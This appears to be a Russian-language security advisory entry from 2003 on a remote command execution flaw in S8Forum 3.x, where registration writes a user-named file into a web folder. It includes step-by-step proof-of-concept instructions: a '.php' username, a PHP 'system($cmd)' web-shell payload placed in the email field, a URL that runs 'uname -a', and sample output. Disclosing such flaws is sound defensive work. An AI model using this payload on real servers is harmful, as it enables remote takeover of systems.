Дата публикации: | 13.01.2003 |
Всего просмотров: | 1217 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | S8Forum 3.x |
Описание: | S8Forum (http://www.kellishaver.com/) уязвим к удаленному выполнению произвольных команд. Когда пользователь регистрируется на форуме, локально создается файл с указанным именем пользователя с данными пользователя. В результате, злонамеренный пользователь может создать файл со злонамеренным именем и PHP (.php) расширением, который будет содержать злонамеренный PHP код. Этот файл может быть вызван через HTTP. Пример: - go to Register - insert in Username: any_name.php NOTE: .php :) - in password : any_pasword. - in E-Mail: <? system($cmd); ?> or any code :( - now go to this URL: http://sitename/s8forumfolder/users/any_name.php?cmd=uname%20-a ------ out --- evil.php:c4ca4238a0b923820dcc509a6f75849b Linux xxx.xxx.net 2.4.18 #2 SMP Mon Nov 18 16:50:02 CST 2002 i686 unknown ------ out ---Уязвимость обнаружена в Kelli Shaver S8Forum 3.0 |
Ссылки: | A security vulnerability in S8Forum |